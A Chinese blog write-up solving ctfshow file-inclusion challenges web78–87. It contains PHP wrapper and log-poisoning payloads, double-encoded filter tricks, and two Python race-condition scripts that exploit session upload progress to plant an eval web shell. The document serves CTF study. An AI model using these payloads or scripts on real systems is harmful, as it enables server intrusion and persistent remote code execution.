ctfshow学习记录-web入门(文件包含78-87)

已于 2022-08-11 14:32:29 修改
阅读量1.7k 收藏 5
点赞数 5
分类专栏: ctf-web # ctfshow-web 文章标签: 学习 php
于 2022-07-04 10:30:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48780534/article/details/125410757
版权

目录

这一组题经常半夜搞,不得不说真是太卷了,虽然是被迫的。

web78

解答:​ include包含,直接用伪协议就可以。

?file=php://filter/convert.base64-encode/resource=flag.php

web79

解答:把php替换了,但是没有过滤大小写。改用Php绕过

?file=Php://input
​	post:<?php system('ls');?>
    #有时候浏览的HackBar不好用,post过不去,需要用burpsuit。
    
或者用data协议:
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
#  PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');

web80

解答
方法一:没有过滤大小写,上一题的payload依旧可以。

?file=Php://input
	post:<?php system('ls');?>

方法二:也可以用包含日志文件的方式。具体可以参考web38的wp。

方法三:日志文件还可以这样用:在User-Agent处写php语句。利用 UA 插入 payload 到日志文件,之后再包含它。
在这里插入图片描述
当前目录下有fl0g.php。
在这里插入图片描述获取flag。
在这里插入图片描述

web81

解答: 过滤了php,data,冒号,不过滤大小写。所以可以日志文件包
含,getshell。上题的方法二和方法三都是可以用的。

web82-86

竞争环境需要晚上11点30分至次日7时30分之间做,其他时间不开放竞争条件。

解答:本题还过滤了小数点。

session竞争包含没做过,正好学习一下。
利用session.upload_progress进行文件包含和反序列化渗透

利用PHP中的session.upload_progress功能作为跳板,将恶意语句写入session文件,然后包含session文件。
接下来,需要知道session文件的存放位置。

1)题目中没有session_start(),但是可以通过自定义Session ID初始化Session。如,设置PHPSESSID=AAA,PHP将会在服务器上创建一个文件:/tmp/sess_AAA”,文件里存放了键值,键值由ini.get(“session.upload_progress.prefix”)+session.upload_progress.name值组成。

但因为默认配置session.upload_progress.cleanup = on(意思是当文件上传结束后,php将会立即清空对应session文件中的内容)。所以,我们文件上传后,session文件内容会被立即清空。这就要利用竞争,在session文件内容被清空前进行包含利用。

2)先说一下,晚上11点半之后,可能是我打的那几天晚上也有人在竞争,环境负载明显不稳定,前期一直报503,1点左右突然跑成功了。

特此说明:这组题我做的比较早,属于是上周之前写好的,并不是平台不稳定那段时间做的,所以按一般情况来说,也是比较建议或者晚一点1点左右,或者早上早起一会儿去竞争。

方法一:利用脚本。wp提供的脚本,群里有。(这个脚本非常推荐,是直接在网站目录下写入了木马,2点左右的攻击就非常顺利了)
web82-86的题目下面这个脚本是完全适用的,第二个脚本和bp那个,我没有再测试,熬夜伤身体,hold不住了。

记得加上端口8080

import requests
import io
import threading

url='http://9a77fcb3-6f3c-4bd6-a247-07bfe6766509.challenge.ctf.show:8080/'
sessionid='ctfshow'
data={
	"1":"file_put_contents('/var/www/html/jiuzhen.php','<?php eval($_POST[3]);?>');"
}
#这个是访问/tmp/sess_ctfshow时,post传递的内容,是在网站目录下写入一句话木马。这样一旦访问成功,就可以蚁剑连接了。
def write(session):#/tmp/sess_ctfshow中写入一句话木马。
	fileBytes = io.BytesIO(b'a'*1024*50)
	while True:
		response=session.post(url,
			data={
			'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'
			},
			cookies={
			'PHPSESSID':sessionid
			},
			files={
			'file':('ctfshow.jpg',fileBytes)
			}
			)

def read(session):#访问/tmp/sess_ctfshow,post传递信息,在网站目录下写入木马。
	while True:
		response=session.post(url+'?file=/tmp/sess_'+sessionid,data=data,
			cookies={
			'PHPSESSID':sessionid
			}
			)
		resposne2=session.get(url+'jiuzhen.php');#访问木马文件,如果访问到了就代表竞争成功
		if resposne2.status_code==200:print('++++++done++++++')
		else:
			print(resposne2.status_code)

if __name__ == '__main__':

	evnet=threading.Event()
	#写入和访问分别设置5个线程。
	with requests.session() as session:
		for i in range(5):
			threading.Thread(target=write,args=(session,)).start()
		for i in range(5):
			threading.Thread(target=read,args=(session,)).start()

	evnet.set()

成功在网站根目录/var/www/html下放入一句话木马文件,post获取flag。

在这里插入图片描述
获取flag。
在这里插入图片描述

还有一个常规的脚本:

import io
import requests
import threading
sessid = 'jiuzhen'
data = {1:"system('cat fl0g.php');"}
url='http://9a77fcb3-6f3c-4bd6-a247-07bfe6766509.challenge.ctf.show:8080/'
def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post(url, data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[1]);?>jiuzhen'}, files={'file': ('jiuzhen.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
    while True:
        resp = session.post(url+'?file=/tmp/sess_'+sessid,data=data)
        if 'jiuzhen' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,30): 
            threading.Thread(target=write,args=(session,)).start()

        for i in range(1,30):
            threading.Thread(target=read,args=(session,)).start()
    event.set()

在这里插入图片描述

方法二:使用burp。可以参考csdn博主:xiaolong22333

最后再对web83-86的题目做一下分析
web83的开篇设置了session_unset();session_destroy();

session_unset():释放当前在内存中已经创建的所有$_SESSION变量,但不删除session文件以及不释放对应的。
session_destroy():删除当前用户对应的session文件以及释放sessionid,内存中的$_SESSION变量内容依然保留。

就是释放和清除了前面所有session变量和文件,但是我们的解题思路是竞争上传那一瞬间创建的session,所以不影响。

web84里,加上了一个system(rm -rf /tmp/*);,因为本来session.upload_progress.cleanup = on,就会清空对应session文件中的内容,这里加上删除,对竞争的影响不大。(但是可能需要增加一些线程)

web85添加了一个内容识别,如果有<就die,依旧可以竞争。

web86里,dirname(__FILE__)表示当前文件的绝对路径。set_include_path函数,是用来设置include的路径的,就是include()可以不提供文件的完整路径了。
include文件时,当包含路径既不是相对路径,也不是绝对路径时(如:include(“test.php”)),会先查找include_path所设置的目录。
脚本里用的是完整路径,不影响竞争。

web87

解答
这次有两个参数file和content,其中file最后有一个urldecode,url解码,所以传参时需要两次url编码。中间还有一个die函数需要绕过,避免程序终止。

base64可以绕过die函数。因为base64编码范围是 0 ~ 9,a ~ z,A ~ Z,+,/ ,所以除了这些字符,其他字符都会被忽略掉。

base64过滤之后就只有(phpdie)6个字符了,base64要求把每三个8Bit的字节转换为四个6Bit的字节,所以这里也要凑够四个字节的倍数,避免base64解码出问题,这里加上两个字符即可。

/?file=php://filter/write=convert.base64-decode/resource=jiuzhen.php进行url两次编码后:

?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%36%61%25%36%39%25%37%35%25%37%61%25%36%38%25%36%35%25%36%65%25%32%65%25%37%30%25%36%38%25%37%30

post:传递一个<?php system('ls');?>,base64编码一下
content=aaPD9waHAgc3lzdGVtKCdscycpOz8+
在这里插入图片描述
发现fl0g.php,读取一下即可。(也可以直接放入一句话木马,蚁剑连接)
在这里插入图片描述

九枕
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTFshow 文件包含 web87
Kradress的博客
12-12 1914
目录源码思路题解题解一题解二总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 21:57:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])
CTFShow文件包含(web78-88)
lonmar的博客
11-28 3046
web78 php://input + POSTdata命令执行 ?file=php://filter/convert.base64-encode/resource=flag.php web79 大小写绕过str_replace str_replace() 函数替换字符串中的一些字符(区分大小写)。 2. data:// ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web80 大小写
ctfshow文件包含web87-117
m0_62207170的博客
06-19 474
ctfshow文件包含web87-117
CTFshow 文件包含Web78-Web117
最新发布
dasdasdasvsdV的博客
08-04 307
注意用法,allow_url_fopen和allow_url_include都满足的时候才可以用常用场景:文件包含、文本包含。
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 838
文件包含php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
CTFshow web入门——文件包含
小元砸的博客
02-07 3868
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
文件包含(ctfshow web入门
qq_47168481的博客
11-17 3398
web79 本题考察php伪协议中的其他方法,对php进行了过滤 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); } 可以采用data伪协议 file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== 后面的base64
ctfshow web入门 文件包含
Lum1n0us's Blog
02-03 1054
文章目录web78web79web80-81web82-86web87web88web116web117参考链接 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 第一题是最基础的文件包含,直接上payload payload: ?file=php://filter/convert.base64-enco
CTFshow(web入门)(17~)
chenjyboke的博客
02-19 3328
web17 问题: 备份的sql文件会泄露敏感信息 解决:直接查询 backup.sql打开文件得到flag web18 问题: 不要着急,休息,休息一会儿,玩101分给你flag 解决: 查看源码发现js文件。发现unicode编码解码中文发现访问查看110.php找到flag web19 问题 密钥什么的,就不要放在前端了 解决:查看源码发现账号密码,由于加密使用post传参等得到flag web20 问题: mdb文件是早期asp+acces..
[ctfshow]web入门——文件上传(web156-web163)
ShenZ的博客
03-18 5635
[ctfshow]web入门——文件上传 web156 上传.user.ini web157 web158 web159 web160 上传.user.ini+日志包含 web161 web162 way1:远程文件包含 way2:session条件竞争包含 web163 上传口 试了试upload界面有一个默认文件,可以用上传.user.ini的方法 后台应该是屏蔽了很多字符串(php
ctfshow web入门 命令执行web29-web57详解
2401_84009597的博客
04-12 677
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
ctfshow-web-命令执行,网络安全开发的基础知识
2401_83739727的博客
04-03 681
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
CTFSHOW命令执行web入门29-54
m0_73605862的博客
02-09 1994
这里就记录一下ctfshow的刷题记录web入门的命令执行专题里面的题目,他是有分类,并且覆盖也很广泛,所以就通过刷这个来,不过里面有一些脚本的题目发现我自己根本不会笑死。如果还不怎么知道写题的话,可以去看我的gitbook,当然csdn我也转载了我自己的文章。如果你能去我的github为我的gitbook项目点亮星星或者follow me 那我将更开心。并且github和gitbook里面更详细,有更多关于web安全方面的知识,观感也会更好o。
CTFshow——web入门——文件包含
h_adam的博客
10-24 4093
web入门——文件包含web78 web78 题目 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 题解
ctfshow web入门文件包含
qq_53263789的博客
07-19 695
ctfshow
ctfshow web入门-文件包含
LYJ20010728的博客
06-23 493
ctfshow web入门-文件包含web78web79web80 web78 filter伪协议读取:?file=php://filter/read=convert.base64-encode/resource=flag.php,base64解码 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } web79 由于过滤了 p
ctfshow->web入门->文件包含
m0_74940843的博客
11-04 491
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。
WEB-ctfshow入门文件包含
ing_end的博客
06-04 457
查看源码可以发现只能上传png图片 修改为php 修改上传格式为php,上传一句话马,蚁剑连接得flag 后端校验 上传一句话,png文件用burp抓包 修改文件名后缀为php,访问被解析,蚁剑连接得flag。打开发现/upload下存在index.php文件,我们可以利用.user.ini, 前端把后缀限制去掉,accept改为file,上传user.ini Content-Type修改为image/png 蚁剑连接得flag。 提示文件内容不合规,发现过滤了php,可使用短标签 蚁剑连接得f
ctfshow-web-web红包题
07-14
### 回答1: ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,我们注意到了一个提交订单的功能,并且发现了其中一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程中,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的题目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包题是一个CTF(Capture the Flag)比赛中的Web题目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛中,参赛者需要通过解决各种不同类型的安全挑战来积分。 该题目中的Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具中的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全问题。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解题方法还需要根据题目中的具体情况来确定。在CTF比赛中,每个题目的设置都可能不同,解题的方法和思路也会有所差异。因此,在解题过程中,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包题是一个CTF比赛中的网络题目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其中,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录中的文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件并执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录中的文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页中的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值